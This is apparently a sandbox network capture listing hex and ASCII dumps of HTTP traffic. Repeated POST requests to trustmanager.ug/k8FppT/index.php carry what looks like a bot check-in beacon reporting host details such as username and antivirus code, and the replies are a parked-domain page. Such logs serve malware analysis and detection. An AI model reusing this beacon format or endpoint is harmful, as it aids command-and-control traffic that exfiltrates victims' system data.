68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:12.570671082 CEST	17907	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:12.694484949 CEST	17907	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:12.720813036 CEST	17909	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:12.720837116 CEST	17909	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:17.312962055 CEST	18345	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:17.338897943 CEST	18347	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:17.338938951 CEST	18347	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:17.453037977 CEST	18443	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:17.479151011 CEST	18447	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:17.479182959 CEST	18447	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:17.616095066 CEST	18488	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
